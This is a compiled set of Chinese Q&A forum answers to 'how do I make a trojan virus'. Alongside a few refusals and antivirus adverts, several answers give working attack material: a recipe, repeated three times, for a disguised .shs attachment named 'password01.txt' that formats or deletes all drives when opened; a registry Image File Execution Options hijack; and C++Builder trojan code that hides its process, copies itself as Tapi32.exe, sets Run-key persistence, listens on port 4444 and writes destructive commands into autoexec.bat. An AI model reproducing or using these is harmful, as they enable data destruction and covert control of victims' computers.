Ⅰ 怎麼製作最簡單的木馬病毒
問一下,樓主要弄這個干什麼?
我試了一下上面的步驟,沒什麼變化啊
請把目的告訴我
Ⅱ 怎麼編輯木馬病毒(詳細點)最好有教程!
你以為那麼容易啊。。。先學習編程去~做木馬病毒不是想做就可以做的。還有,這個問題估計待會就會被刪除哦~習慣就好。。
Ⅲ 木馬病毒怎樣製作
希望抄我的回答可以幫助樓主解決問題哦我在這里十分不想給樓主潑涼水啊
我還是建議樓主不要輕易嘗試木馬的任何操作,這樣不僅僅危害他人電腦,還會給自己的電腦同樣帶來病毒以及木馬的危害可能,如果你曾經這樣操作過的話還是先查殺病毒為妥,下面的方法給樓主參考
1.下載騰訊電腦管家-對電腦進行安全體檢,並且打開所有防火牆避免系統其餘文件的感染,防止病毒再次侵入,它是防禦病毒的第一道防線,尤其重要
2.打開電腦管家-殺毒-閃電查殺/全盤查殺,記得在殺毒時要打開小紅傘引擎。
3.為了更加安全,同樣可以對電腦進行頑固木馬的清理,方法很簡單,打開電腦管家-工具箱-安全-頑固木馬剋星來進行頑固木馬程序的清理
4.同時我也建議樓主哦,如果電腦存在系統高危漏洞時,電腦本身不安全是很容易感染病毒和木馬的,建議用電腦管家來經常進行系統漏洞的修復,方法為打開電腦管家-修復漏洞-一鍵修復
5.最好在殺毒或是清理過木馬以後盡量重啟電腦,確保清除多餘系統緩存文件,避免重復感染的問題產生。
6.平時也不要接陌生人發的文件和圖片,裡面很有可能加的木馬病毒,對於危險網站建議也不要進入,裡面也是有木馬的。
以上我的回答供樓主參考解決問題,望採納。
Ⅳ 如何製造木馬病毒
學木馬先要會編程,你先把這個搞懂吧!我就是!
1.創建一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板
文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後
點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈
出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令
:start.exe
/m
format
c:/q
/autotest
/u
,點擊「確定」,此時,內容欄中會顯示
出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一
個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名
稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默
認名為」片段」),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面
上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作
為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文
所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:st
art.exe
/m
deltree
/y
a:\*.*
c:\*.*
d:\*.*
則是將刪除對方硬碟下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe
/m
deltree
/y
c:\windows\system\*.*
則是刪除對方c:\windows\system\目錄底下的所有文件.(當
然大家可以改成其它的命令)
很簡單,這樣一個惡意的攻擊程序被弄出來了!
Ⅳ 怎麼製作最簡單的木馬病毒
開始 運行 regedit
定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
新建一個字元串,名字和要劫持的exe名字相同,比如QQ.EXE(換成你要鎖住的內exe名),然後容雙擊這個字串,輸入"Debugger"="0.exe"即可
Ⅵ 教我製作木馬病毒
你倒不如提問怎麼做防毒軟體
Ⅶ 我想做個簡單的木馬病毒,怎麼做,用什麼軟體
1.創建一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板
文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後
點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈
出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令
:start.exe
/m
format
c:/q
/autotest
/u
,點擊「確定」,此時,內容欄中會顯示
出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一
個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名
稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默
認名為」片段」),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面
上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作
為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文
所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:st
art.exe
/m
deltree
/y
a:\*.*
c:\*.*
d:\*.*
則是將刪除對方硬碟下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe
/m
deltree
/y
c:\windows\system\*.*
則是刪除對方c:\windows\system\目錄底下的所有文件.(當
然大家可以改成其它的命令)
很簡單,這樣一個惡意的攻擊程序被弄出來了
Ⅷ 怎樣編寫木馬病毒(菜鳥)
願我的答案 能夠解決您的煩憂
製作病毒是不法行為!維護網路綠色環境人人有版責,千萬別用木馬病毒啊啊啊
下載權騰訊電腦管家「8.5」最新版,對電腦首先進行一個體檢,打開所有防火牆避免系統其餘文件被感染。
打開殺毒頁面開始查殺,切記要打開小紅傘引擎。
如果普通查殺不能解決問題,您可以打開騰訊電腦管家---工具箱---頑固木馬專殺- 進行深度
掃描。
查殺處理完所有病毒後,立刻重啟電腦,再進行一次安全體檢,清除多餘系統緩存文件,避免二次感染。
如果您對我的答案不滿意,可以繼續追問或者提出寶貴意見,謝謝
Ⅸ 木馬病毒是怎麼製作的
樓上見解很好,
C語言編寫沒錯的。但是,木馬很多種,實施的手段也不一,
給你個簡單胡製作
1.創建一個只包含一個空格(
為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板
文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後
點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈
出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令
:start.exe
/m
format
c:/q
/autotest
/u
,點擊「確定」,此時,內容欄中會顯示
出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一
個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名
稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默
認名為」片段」),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面
上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作
為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文
所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:st
art.exe
/m
deltree
/y
a:\*.*
c:\*.*
d:\*.*
則是將刪除對方硬碟下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe
/m
deltree
/y
c:\windows\system\*.*
則是刪除對方c:\windows\system\目錄底下的所有文件.(當
然大家可以改成其它的命令)
很簡單,這樣一個惡意的攻擊程序被弄出來了!
呵呵,考慮
玩玩呀,
Ⅹ 如何編寫木馬病毒的具體操作
木馬一定是由兩部分組成——伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定/義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加/載RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得/到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://執/行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
file://卸/載動態鏈接庫
}
}
這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。接著再將自己拷貝一份到%System%目錄下,例如:
C:\Windows\System,並修改注冊表,以便啟動時自動載入:
{
char TempPath[MAX_PATH];
file://定/義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath/是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格/式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://將/自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
file://定/義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設/置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打/開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
{
file://如/果以下語句發生異常,跳至catch,以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查/找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
file://如/果不是,就寫入以上鍵值和內容
}
catch(...)
{
file://如/果有錯誤,什麼也不做
}
}
好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。
接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定/義了一堆待會兒要用到的變數
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下/建立一個文本文件Win369.bat,作為臨時文件使用
AnsiString temp=Socket->ReceiveText();
file://接/收客戶端(攻擊者,也就是你自己)傳來的數據
}
好,大門敞開了!接著就是修改目標機的各種配置了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
file://如/果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length();
file://得/到字元串的長度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://將/第11個字元轉換成integer型,存入file_name變數
file://為/什麼要取第11個字元,因為第10個字元是空格字元
content=(temp.SubString(12,number-11)+'\n').c_str();
file://余/下的字元串將被作為寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);
chmod("c:\\config.sys",S_IREAD|S_IWRITE);
file://將/兩個目標文件的屬性改為可讀可寫
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如/果第11個字元是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如/果第11個字元是1,就把Config.sys格式化
times_of_try=0;
file://定/義計數器
while(fp==NULL)
{
file://如/果指針是空
fp=fopen(filename,"a+");
file://如/果文件不存在,創建之;如果存在,准備在其後添加
file://如/果出錯,文件指針為空,這樣就會重復
times_of_try=times_of_try+1;
file://計/數器加1
if(times_of_try>100)
{
file://如/果已經試了100次了,仍未成功
Socket->SendText("Fail By Open File");
file://就/發回「Fail By Open File」的錯誤信息
goto END;
file://跳/至END處
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://寫/入添加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!
fclose(fp);
file://寫/完後關閉目標文件
Socket->SendText("Sucess");
file://然/後發回「Success」的成功信息
}
}